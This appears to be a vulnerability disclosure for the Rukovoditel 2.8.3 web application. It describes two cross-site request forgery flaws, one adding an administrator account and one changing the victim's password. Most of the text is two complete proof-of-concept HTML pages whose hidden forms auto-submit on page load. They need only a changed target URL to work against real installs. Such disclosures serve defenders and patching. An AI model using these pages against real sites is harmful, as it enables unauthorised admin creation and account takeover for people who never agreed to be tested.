The official github of the project is: https://github.com/Rukovoditel/Rukovoditel, but hasn't been updated for a long time. The source code of the software can be downloaded at: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_2.8.3.zip/download
Vulnerabilities description
- Attacker may exploit the CSRF vulenrability to add user with admin privilege. Process: (1) Admin login to his own account with correct credential. (2) The advesary crafts the following web page with an username "admin2" and password "admin2", and hosts it online.
<html>
<head>
<title>CSRF add admin user</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
function fireForms()
{
var count = 2;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
}
}
</script>
<H2>Cross Site Request Forgery</H2>
<form method="POST" name="form1" action="http://localhost/rukovoditel/index.php?module=users/validate_form">
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="useremail" value="admin@admin.com"/>
</form>
<form method="POST" name="form0" action="http://localhost/rukovoditel/index.php?module=items/&action=save">
<input type="hidden" name="path" value="1"/>
<input type="hidden" name="redirect_to" value=""/>
<input type="hidden" name="parent_item_id" value="0"/>
<input type="hidden" name="fields[5]" value="1"/>
<input type="hidden" name="fields[14]" value="default"/>
<input type="hidden" name="fields[6]" value="0"/>
<input type="hidden" name="fields[12]" value="admin2"/>
<input type="hidden" name="password" value="admin2"/>
<input type="hidden" name="fields[7]" value="admin2"/>
<input type="hidden" name="fields[8]" value="lastname"/>
<input type="hidden" name="fields[10]" value="lastname"/>
<input type="hidden" name="fields[9]" value="admin2@admin.com"/>
<input type="hidden" name="fields[13]" value="english.php"/>
</form>
</body>
</html>
(3) Once the admin visit such website, he will create a new user with username "admin2" and password "admin2".
- Attacker may exploit the CSRF vulenrability to change admin password. Process: (1) Admin login to his own account with correct credential. (2) The advesary crafts the following web page with a new password ("newpassword"), and hosts it online.
<html>
<head>
<title>CSRF change password</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
function fireForms()
{
var count = 1;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
}
}
</script>
<H2>Cross Site Request Forgery (Edit Existing Admin details)</H2>
<form method="POST" name="form0" action="http://localhost/rukovoditel/index.php?module=users/change_password&action=change">
<input type="hidden" name="password_new" value="newpassword"/>
<input type="hidden" name="password_confirmation" value="newpassword"/>
</form>
</body>
</html>
(3) For anyone (including admin) who logged in to the account and visited this website, his credential will be changed to new password ("newpassword").